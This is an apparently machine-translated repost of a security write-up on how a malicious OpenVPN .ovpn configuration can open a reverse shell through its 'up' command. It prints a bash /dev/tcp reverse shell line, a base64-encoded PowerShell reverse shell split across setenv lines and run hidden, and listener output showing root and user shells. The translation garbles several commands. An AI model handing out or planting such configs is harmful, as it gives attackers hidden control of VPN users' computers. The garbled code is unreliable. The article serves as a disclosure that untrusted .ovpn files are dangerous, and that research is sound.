Shulou(Shulou.com)05/31 Report--

From the OpenVPN configuration file to create a bounce Shell how to achieve user system control, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain in detail for you, people with this need can come to learn, hope you can gain something.

Clue

While doing some basic research on OpenVPN applications, I came across such an interesting question on the stackexchange forum:

This user does not seem to be asking about the security of using free OpenVPN, but whether OpenVPN's own .ovpn configuration file is secure. Since there was no satisfactory answer at the end of the stackexchange forum, I studied it in depth and came to the surprising conclusion that yes, untrusted ovpn files are very dangerous.

test

Let's start from the beginning. The ovpn file is a configuration file provided to the OpenVPN client or server, which details everything about the VPN connection, including the remote server to connect to, the password to use, the protocol to log in, the user identity, and so on.

The simplest form of ovpn file is as follows:

Remote 192.168.1.245

Ifconfig 10.200.0.2 10.200.0.1

Dev tun

The above file indicates that the client will connect to the remote service with IP 192.168.1.245 without authentication or encryption, and in the process, a route pattern called tun will be established to implement point-to-point protocols between different clients of the system. For example, under the tun route mode here, the tun client is 10.200.0.2 and the tun server is 10.200.0.1 That is, the local tun device address. The three-line ovpn configuration file here is just a simple example. the ovpn file in a real application environment is hundreds of lines at random, which contains a lot of complex functional configurations.

In this article, we will focus on the up command of the OpenVPN configuration feature, which is described in the official description document:

The cmd command after TUN/TAP mode is successfully enabled.

The cmd command contains a script execution path and optional multiple execution parameters. This execution path and parameters can be emphasized by single or double quotes, or by a backslash, separated by spaces. The up command can be used to specify a route, in which IP traffic destined for the private subnet at the other end of the VPN is routed to the tunnel.

In essence, the up command executes any script you point to. If the victim is using a version of the Bash command that supports / dev/tcp, it's easy to create a bounce control shell on the victim's system. As shown in the following ovpn file, you can create a bouncing shell connected to 192.168.1.218purl 8181.

Remote 192.168.1.245

Ifconfig 10.200.0.2 10.200.0.1

Dev tun

Script-security 2

Up "/ bin/bash-c'/ bin/bash-I > / dev/tcp/192.168.1.218/8181 031'"

When using this ovpn file, the user will not see an obvious problem, the VPN connection will be established normally, and the traffic will be smooth. There are only two signs in the following log that are suspicious. To make it easier to read, I show it in bold:

Thu Jun 7 12:28:23 2018 disabling NCP mode ( -  ncp-disable) because not in P2MP client or server mode

Thu Jun 7 12:28:23 2018 OpenVPN 2.5_git [git:HEAD/1f458322cdaffed0+*] x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [MH/PKTINFO] [AEAD] built on Jun 7 2018

Thu Jun 7 12:28:23 2018 library versions: OpenSSL 1.0.2g 1 Mar 2016, LZO 2.08

Thu Jun 7 12:28:23 2018 NOTE: the current  -  script-security setting may allow this configuration to call user-defined scripts

Thu Jun 7 12:28:23 2018 * WARNING *: All encryption and authentication features disabled  -  All data will be tunnelled as clear text and will not be protected against man-in-the-middle changes. PLEASE DO RECONSIDER THIS CONFIGURATION!

Thu Jun 7 12:28:23 2018 TUN/TAP device tun0 opened

Thu Jun 7 12:28:23 2018 do_ifconfig, tt- > did_ifconfig_ipv6_setup=0

Thu Jun 7 12:28:23 2018 / sbin/ifconfig tun0 10.200.0.2 pointopoint 10.200.0.1 mtu 1500

Thu Jun 7 12:28:23 2018 / bin/bash-c / bin/bash-I > / dev/tcp/192.168.1.218/8181 01 & tun0 1500 1500 10.200.0.2 10.200.0.1 init

Thu Jun 7 12:28:23 2018 TCP/UDP: Preserving recently used remote address: [AF_INET] 192.168.1.245:1194

Thu Jun 7 12:28:23 2018 UDP link local (bound): [AF_INET] [undef]: 1194

Thu Jun 7 12:28:23 2018 UDP link remote: [AF_INET] 192.168.1.245:1194

Thu Jun 7 12:28:33 2018 Peer Connection Initiated with [AF_INET] 192.168.1.245:1194

Thu Jun 7 12:28:34 2018 WARNING: this configuration may cache passwords in memory  -  use the auth-nocache option to prevent this

Thu Jun 7 12:28:34 2018 Initialization Sequence Completed

Even if the the user does see these log entries a reverse shell has already been established with our listener on 192.168.1.218:

Albinolobster@ubuntu:~$ nc-lvp 8181

Listening on [0.0.0.0] (family 0, port 8181)

Connection from [192.168.1.247] port 8181 [tcp/*] accepted (family 2, sport 54836)

Root@client:/home/client/openvpn# id

Id

Uid=0 (root) gid=0 (root) groups=0 (root)

Root@client:/home/client/openvpn#

Linux systems that use the Bash command can easily implement this attack, but in an environment without / dev/tcp capabilities like Windows, it's a bit difficult to successfully create a bouncing shell in it.

Fortunately, TrustedSec's Dave Kennedy writes a small powershell reverse shell, which we can use to operate. Using the-EncodedCommand argument of powershell.exe, we can pass the entire script content on the command line. But first, we need to base64 the script to avoid inserting escapes. My friend Carlos Perez has a script called ps_encoder.py that can be used to implement base64 coding.

There is another problem after this. The encoded bounce shell script is more than 4000 characters long, but OpenVPN has a limit of 256 characters. To solve this problem, we can split the scripts using the setenv command, and then reassemble them in the up command. Therefore, consider the following ovpn file:

Ifconfig 10.200.0.2 10.200.0.1

Dev tun

Remote 192.168.1.245

Script-security 2

Setenv Z1 C:\\ Windows\\ System32\\ WindowsPowerShell\ v1.0\ powershell.exe

Setenv A1 'ZgB1AG4AYwB0AGkAbwBuACAAYwBsAGUAYQBuAHUAcAAgAHsADQAKAGkAZgAgACgAJABjAGwAaQBlAG4AdAAuAEMAbwBuAG4AZQBjAHQAZQBkACAALQBlAHEAIAAkAHQAcgB1AGUAKQAgAHsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkAfQANAAoAaQBmACAAKAAkAHAAcgBvAGMAZQBzAHMALgBFAHgAaQB0AEM'

Setenv b1 'AbwBkAGUAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAkAHAAcgBvAGMAZQBzAHMALgBDAGwAbwBzAGUAKAApAH0ADQAKAGUAeABpAHQAfQANAAoAJABhAGQAZAByAGUAcwBzACAAPQAgACcAMQA5ADIALgAxADYAOAAuADEALgAyADEAOAAnAA0ACgAkAHAAbwByAHQAIAA9ACAAJwA4ADEAOAAxACcADQAKACQAYwBsAG'

Setenv C1 'kAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgBzAG8AYwBrAGUAdABzAC4AdABjAHAAYwBsAGkAZQBuAHQADQAKACQAYwBsAGkAZQBuAHQALgBjAG8AbgBuAGUAYwB0ACgAJABhAGQAZAByAGUAcwBzACwAJABwAG8AcgB0ACkADQAKACQAcwB0AHIAZQBhAG0AIAA9A'

Setenv D1 'CAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQANAAoAJABuAGUAdAB3AG8AcgBrAGIAdQBmAGYAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEIAeQB0AGUAWwBdACAAJABjAGwAaQBlAG4AdAAuAFIAZQBjAGUAaQB2AGUAQgB1AGYAZgBlAHIAUwBpAHoAZQAN'

Setenv E1 'AAoAJABwAHIAbwBjAGUAcwBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMADQAKACQAcAByAG8AYwBlAHMAcwAuAFMAdABhAHIAdABJAG4AZgBvAC4ARgBpAGwAZQBOAGEAbQBlACAAPQAgACcAQwA6AFwAXAB3AGkAbgB'

Setenv F1 'kAG8AdwBzAFwAXABzAHkAcwB0AGUAbQAzADIAXABcAGMAbQBkAC4AZQB4AGUAJwANAAoAJABwAHIAbwBjAGUAcwBzAC4AUwB0AGEAcgB0AEkAbgBmAG8ALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAEkAbgBwAHUAdAAgAD0AIAAxAA0ACgAkAHAAcgBvAGMAZQBzAHMALgBTAHQAYQByAHQASQBuAGYAbw'

Setenv G1 'AuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAIAA9ACAAMQANAAoAJABwAHIAbwBjAGUAcwBzAC4AUwB0AGEAcgB0AEkAbgBmAG8ALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQAgAD0AIAAwAA0ACgAkAHAAcgBvAGMAZQBzAHMALgBTAHQAYQByAHQAKAApAA0ACgAkAGkAb'

Setenv H2 'gBwAHUAdABzAHQAcgBlAGEAbQAgAD0AIAAkAHAAcgBvAGMAZQBzAHMALgBTAHQAYQBuAGQAYQByAGQASQBuAHAAdQB0AA0ACgAkAG8AdQB0AHAAdQB0AHMAdAByAGUAYQBtACAAPQAgACQAcAByAG8AYwBlAHMAcwAuAFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAA'

Setenv i1 'MQANAAoAJABlAG4AYwBvAGQAaQBuAGcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAcwBjAGkAaQBFAG4AYwBvAGQAaQBuAGcADQAKAHcAaABpAGwAZQAoACQAbwB1AHQAcAB1AHQAcwB0AHIAZQBhAG0ALgBQAGUAZQBrACgAKQAgAC0AbgBlACAALQAxACkAewAkAG8'

Setenv J1 'AdQB0ACAAKwA9ACAAJABlAG4AYwBvAGQAaQBuAGcALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAbwB1AHQAcAB1AHQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAKQApAH0ADQAKACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGUAbgBjAG8AZABpAG4AZwAuAEcAZQB0AEIAeQB0AGUAcwAoACQAbwB1AHQAKQAsAD'

Setenv K1 'AALAAkAG8AdQB0AC4ATABlAG4AZwB0AGgAKQANAAoAJABvAHUAdAAgAD0AIAAkAG4AdQBsAGwAOwAgACQAZABvAG4AZQAgAD0AIAAkAGYAYQBsAHMAZQA7ACAAJAB0AGUAcwB0AGkAbgBnACAAPQAgADAAOwANAAoAdwBoAGkAbABlACAAKAAtAG4AbwB0ACAAJABkAG8AbgBlACkAIAB7AA0ACgBpAGYAIAAoACQAYwBsA'

Setenv L1 'GkAZQBuAHQALgBDAG8AbgBuAGUAYwB0AGUAZAAgAC0AbgBlACAAJAB0AHIAdQBlACkAIAB7AGMAbABlAGEAbgB1AHAAfQANAAoAJABwAG8AcwAgAD0AIAAwADsAIAAkAGkAIAA9ACAAMQANAAoAdwBoAGkAbABlACAAKAAoACQAaQAgAC0AZwB0ACAAMAApACAALQBhAG4AZAAgACgAJABwAG8AcwAgAC0AbAB0ACAAJABu'

Setenv M1 'AGUAdAB3AG8AcgBrAGIAdQBmAGYAZQByAC4ATABlAG4AZwB0AGgAKQApACAAewANAAoAJAByAGUAYQBkACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABuAGUAdAB3AG8AcgBrAGIAdQBmAGYAZQByACwAJABwAG8AcwAsACQAbgBlAHQAdwBvAHIAawBiAHUAZgBmAGUAcgAuAEwAZQBuAGcAdABoACAALQA'

Setenv N1 'gACQAcABvAHMAKQANAAoAJABwAG8AcwArAD0AJAByAGUAYQBkADsAIABpAGYAIAAoACQAcABvAHMAIAAtAGEAbgBkACAAKAAkAG4AZQB0AHcAbwByAGsAYgB1AGYAZgBlAHIAWwAwAC4ALgAkACgAJABwAG8AcwAtADEAKQBdACAALQBjAG8AbgB0AGEAaQBuAHMAIAAxADAAKQApACAAewBiAHIAZQBhAGsAfQB9AA0ACg'

Setenv o1 'BpAGYAIAAoACQAcABvAHMAIAAtAGcAdAAgADAAKQAgAHsADQAKACQAcwB0AHIAaQBuAGcAIAA9ACAAJABlAG4AYwBvAGQAaQBuAGcALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAbgBlAHQAdwBvAHIAawBiAHUAZgBmAGUAcgAsADAALAAkAHAAbwBzACkADQAKACQAaQBuAHAAdQB0AHMAdAByAGUAYQBtAC4AdwByAGkAd'

Setenv p1 'ABlACgAJABzAHQAcgBpAG4AZwApAA0ACgBzAHQAYQByAHQALQBzAGwAZQBlAHAAIAAxAA0ACgBpAGYAIAAoACQAcAByAG8AYwBlAHMAcwAuAEUAeABpAHQAQwBvAGQAZQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AGMAbABlAGEAbgB1AHAAfQANAAoAZQBsAHMAZQAgAHsADQAKACQAbwB1AHQAIAA9ACAAJABlAG4A'

Setenv Q1 'YwBvAGQAaQBuAGcALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAbwB1AHQAcAB1AHQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAKQApAA0ACgB3AGgAaQBsAGUAKAAkAG8AdQB0AHAAdQB0AHMAdAByAGUAYQBtAC4AUABlAGUAawAoACkAIAAtAG4AZQAgAC0AMQApAHsADQAKACQAbwB1AHQAIAArAD0AIAAkAGUAbgBjAG8'

Setenv R1 'AZABpAG4AZwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABvAHUAdABwAHUAdABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAApACkAOwAgAGkAZgAgACgAJABvAHUAdAAgAC0AZQBxACAAJABzAHQAcgBpAG4AZwApACAAewAkAG8AdQB0ACAAPQAgACcAJwB9AH0ADQAKACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAG'

Setenv S1 'UAbgBjAG8AZABpAG4AZwAuAEcAZQB0AEIAeQB0AGUAcwAoACQAbwB1AHQAKQAsADAALAAkAG8AdQB0AC4AbABlAG4AZwB0AGgAKQANAAoAJABvAHUAdAAgAD0AIAAkAG4AdQBsAGwADQAKACQAcwB0AHIAaQBuAGcAIAA9ACAAJABuAHUAbABsAH0AfQAgAGUAbABzAGUAIAB7AGMAbABlAGEAbgB1AHAAfQB9AA=='

Up'C:\\ Windows\\ System32\\ cmd.exe / c (start% z1%-WindowStyle Hidden-EncodedCommand% A1%% B1% C1%% D1% E1% F1%% G1% H2% i1% P1% F1% G1% 11% M1% N1% P1% Q1% R1% S1% S1% S1) | |

As you can see, the encoded script splits on multiple setenv commands, and eventually the script is grouped together to execute all the environment variables. But similar to our Linux startup example, there is a note about script security when the OpenVPN GUI interface program starts for the first time:

Similarly, even if the user notices or understands the meaning, it is too late, and the shell has already established a connection:

Albinolobster@ubuntu:~$ nc-lvp 8181

Listening on [0.0.0.0] (family 0, port 8181)

Connection from [192.168.1.226] port 8181 [tcp/*] accepted (family 2, sport 51082)

Microsoft Windows [Version 10.0.17134.48]

©2018 Microsoft Corporation. All rights reserved.

C:\ Users\ albinolobster\ OpenVPN\ config\ albino_lobster > whoami

Desktop-r5u6pvd\ albinolobster

C:\ Users\ albinolobster\ OpenVPN\ config\ albino_lobster >

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.